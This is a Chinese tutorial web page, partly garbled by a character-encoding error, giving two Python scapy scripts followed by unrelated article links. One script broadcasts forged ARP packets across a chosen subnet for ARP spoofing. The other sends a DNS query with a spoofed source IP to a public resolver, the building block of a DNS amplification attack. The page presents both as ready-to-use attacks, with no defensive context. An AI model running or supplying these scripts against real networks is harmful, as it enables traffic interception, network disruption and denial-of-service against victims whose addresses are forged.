Python中使用scapy模擬數(shù)據(jù)包實(shí)現(xiàn)arp攻擊、dns放大攻擊例子
scapy是python寫的一個(gè)功能強(qiáng)大的交互式數(shù)據(jù)包處理程序,可用來(lái)發(fā)送、嗅探、解析和偽造網(wǎng)絡(luò)數(shù)據(jù)包,常常被用到網(wǎng)絡(luò)攻擊和測(cè)試中。
這里就直接用python的scapy搞。
這里是arp的攻擊方式,你可以做成arp攻擊。
#!/usr/bin/python
"""
ARP attack
"""
import sys, os
from scapy.all import *
if os.geteuid() != 0:
print "This program must be run as root. Aborting."
sys.exit()
if len(sys.argv) < 2:
print "Pkease Use %s x.x.x" % (sys.argv[0])
exit()
attackIP = sys.argv[1] + ".0/24"
srploop(Ether(dst="FF:FF:FF:FF:FF:FF")/ARP(pdst=attackIP, psrc="192.168.1.100", hwsrc="00:66:66:66:66:66"), timeout=2)
dns放大攻擊
#coding:utf-8
from scapy import *
from scapy.all import *
a = IP(dst='8.8.8.8',src='192.168.1.200') #192.168.1.200 為偽造的源ip
b = UDP(dport=53)
c = DNS(id=1,qr=0,opcode=0,tc=0,rd=1,qdcount=1,ancount=0,nscount=0,arcount=0)
c.qd=DNSQR(qname='www.qq.com',qtype=1,qclass=1)
p = a/b/c
send(p)
~
相關(guān)文章
tensorflow實(shí)現(xiàn)將ckpt轉(zhuǎn)pb文件的方法
這篇文章主要介紹了tensorflow實(shí)現(xiàn)將ckpt轉(zhuǎn)pb文件的方法,本文通過(guò)實(shí)例代碼給大家介紹的非常詳細(xì),對(duì)大家的學(xué)習(xí)或工作具有一定的參考借鑒價(jià)值,需要的朋友可以參考下2020-04-04
python+mysql實(shí)現(xiàn)教務(wù)管理系統(tǒng)
這篇文章主要為大家詳細(xì)介紹了python+mysql實(shí)現(xiàn)教務(wù)管理系統(tǒng),具有一定的參考價(jià)值,感興趣的小伙伴們可以參考一下2019-02-02
Python mutiprocessing多線程池pool操作示例
這篇文章主要介紹了Python mutiprocessing多線程池pool操作,結(jié)合實(shí)例形式分析了Python多線程模塊multiprocessing進(jìn)程池相關(guān)操作技巧,需要的朋友可以參考下2019-01-01
Python 如何操作 SQLite 數(shù)據(jù)庫(kù)
這篇文章主要介紹了Python 如何操作 SQLite 數(shù)據(jù)庫(kù),幫助大家更好的理解和學(xué)習(xí),感興趣的朋友可以了解下2020-08-08
Python如何將數(shù)字變成帶逗號(hào)的千分位
這篇文章主要介紹了Python如何將數(shù)字變成帶逗號(hào)的千分位,具有很好的參考價(jià)值,希望對(duì)大家有所幫助。如有錯(cuò)誤或未考慮完全的地方,望不吝賜教2022-05-05

